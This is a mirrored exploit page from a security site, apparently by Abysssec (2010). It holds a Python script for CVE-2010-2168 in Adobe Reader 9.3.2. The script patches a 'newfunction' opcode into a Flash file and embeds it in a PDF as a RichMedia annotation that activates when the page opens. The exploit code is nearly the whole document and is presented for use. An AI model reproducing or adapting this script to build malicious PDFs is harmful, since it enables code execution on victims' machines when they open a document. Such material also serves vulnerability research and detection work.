首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Adobe Acrobat Reader and Flash 'newfunction' Remote Code Execution Vulnerability
来源:http://www.abysssec.com 作者:Abysssec 发布时间:2010-09-24  

'''
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/

http://www.exploit-db.com/moaub-23-adobe-acrobat-and-reader-newfunction-remote-code-execution-vulnerability/
http://www.exploit.db.com/sploits/moaub-23-exploit.zip
'''

'''
  Title             : Adobe Acrobat Reader and Flash 'newfunction' Remote Code Execution Vulnerability
  Version           : Adobe Reader 9.3.2
  Analysis          : http://www.abysssec.com
  Vendor            : http://www.adobe.com
  Impact            : Critical
  Contact           : shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           : @abysssec
  CVE               : CVE-2010-2168
  MOAUB Number      : MOAUB-06
'''

import sys

class PDF:
    
 def __init__(self):
  self.xrefs = []
  self.eol = '\x0a'
  self.content = ''
  self.xrefs_offset = 0
  
 def header(self):
  self.content += '%PDF-1.6' + self.eol
  
 def obj(self, obj_num, data,flag):
  self.xrefs.append(len(self.content))
  self.content += '%d 0 obj' % obj_num
  if flag == 1:
   self.content += self.eol + '<< ' + data + ' >>' + self.eol
  else:
   self.content += self.eol + data + self.eol
  self.content += 'endobj' + self.eol

 def obj_SWFStream(self, obj_num, data, stream):
  self.xrefs.append(len(self.content))
  self.content += '%d 0 obj' % obj_num
  self.content += self.eol + '<< ' + data + '/Params << /Size %d >> /DL %d /Length %d' %(len(stream),len(stream),len(stream))
  self.content += ' >>' + self.eol
  self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol
  self.content += 'endobj' + self.eol
 
 def obj_Stream(self, obj_num, data, stream):
  self.xrefs.append(len(self.content))
  self.content += '%d 0 obj' % obj_num
  self.content += self.eol + '<< ' + data + '/Length %d' %len(stream)
  self.content += ' >>' + self.eol
  self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol
  self.content += 'endobj' + self.eol
  
 def ref(self, ref_num):
  return '%d 0 R' % ref_num
  
 def xref(self):
  self.xrefs_offset = len(self.content)
  self.content += 'xref' + self.eol
  self.content += '0 %d' % (len(self.xrefs) + 1)
  self.content += self.eol
  self.content += '0000000000 65535 f' + self.eol
  for i in self.xrefs:
   self.content += '%010d 00000 n' % i
   self.content += self.eol
   
 def trailer(self):
  self.content += 'trailer' + self.eol
  self.content += '<< /Size %d' % (len(self.xrefs) + 1)
  self.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol
  self.content += 'startxref' + self.eol
  self.content += '%d' % self.xrefs_offset
  self.content += self.eol
  self.content += '%%EOF'
  
 def generate(self):
  return self.content


  
  
class POC:

    def getSWF(self):
        try:
            fdR = open('flash.swf', 'rb+')
            strTotal = fdR.read()  
            str1 = strTotal[:3673]
   
            command = '\x40\xE8\xD4\xF1\xFF\x33'   #newfunction
   
            str2 = strTotal[3679:]
   
            fdW= open('poc.swf', 'wb+')
            finalStr = str1+command+str2
            fdW.write(finalStr) 
           
            fdR.close()
            return finalStr
           
        except IOError:
            print '[*] Error : An IO error has occurred'
  

def generate_pdf():
 poc = POC()
 swfFile = 'poc.swf'
 pdf = PDF()
 pdf.header()
 pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) ,1)
 pdf.obj(2, '/Count 1/Type/Pages/Kids[ '+pdf.ref(3)+' ]',1)
 pdf.obj(3, '/Annots [ '+pdf.ref(5) +' ]/Parent '+pdf.ref(2) + " /Type/Page"+' /Contents '+pdf.ref(4) ,1)
 pdf.obj_Stream(4, '','')
 pdf.obj(5, '/RichMediaSettings '+pdf.ref(6)+' /NM ( ' + swfFile + ' ) /Subtype /RichMedia /Type /Annot /RichMediaContent '+pdf.ref(7)+' /Rect [ 266 116 430 204 ]',1)
 pdf.obj(6, '/Subtype /Flash /Activation '+pdf.ref(8)+' /Type /RichMediaSettings /Deactivation '+pdf.ref(9),1) 
 pdf.obj(7, '/Type /RichMediaContent /Assets '+pdf.ref(10) +' /Configurations [ ' + pdf.ref(11) + ']',1)
 pdf.obj(8, '/Type /RichMediaActivation /Condition /PO ',1) 
 pdf.obj(9, '/Type /RichMediaDeactivation /Condition /XD ',1) 
 pdf.obj(10, '/Names [('+ swfFile +') ' + pdf.ref(12)+' ]',1) 
 pdf.obj(11, '/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ '+pdf.ref(13) +' ]',1) 
 pdf.obj(12, '/EF <</F '+pdf.ref(14) +' >> /Type /Filespec /F ('+ swfFile +')',1) 
 pdf.obj(13, '/Subype /Flash /Params '+pdf.ref(15) +' /Type /RichMediaInstance /Asset '+ pdf.ref(12) ,1)
 pdf.obj_SWFStream(14, ' /Type /EmbeddedFile  ',poc.getSWF() ) 
 pdf.obj(15, '/Binding /Background /Type /RichMediaParams /FlashVars () /Settings '+pdf.ref(16),1)
 pdf.obj_Stream(16, '<</Length 0 >> ','') 
 
 
 pdf.xref()
 pdf.trailer()
 return pdf.generate()
 
def main():
 if len(sys.argv) != 2:
  print 'Usage: python %s [output file name]' % sys.argv[0]
  sys.exit(0)
 file_name = sys.argv[1]
 if not file_name.endswith('.pdf'):
  file_name = file_name + '.pdf'
 try:
  fd = open(file_name, 'wb+')
  fd.write(generate_pdf())
  fd.close()
  print '[-] PDF file generated and written to %s' % file_name
 except IOError:
  print '[*] Error : An IO error has occurred'
  print '[-] Exiting ...'
  sys.exit(-1)
if __name__ == '__main__':
 main()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·linux/x86 setuid(0) and dd of=
·GreenBrowser DLL Hijacking Exp
·DVD PixPlay DLL Hijacking Expl
·Sothink SWF Decompiler DLL Hij
·SmartSniff DLL Hijacking Explo
·SEasyOfficeRecovery DLL Hijack
·ydownloader DLL Hijacking Expl
·VideoCharge Studio DLL Hijacki
·Kaspersky Internet Security DL
·mobile ringtone audio converte
·MP3 Workstation Version 9.2.1.
·Skybluecanvas.v1.1-r248 CSRF v
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved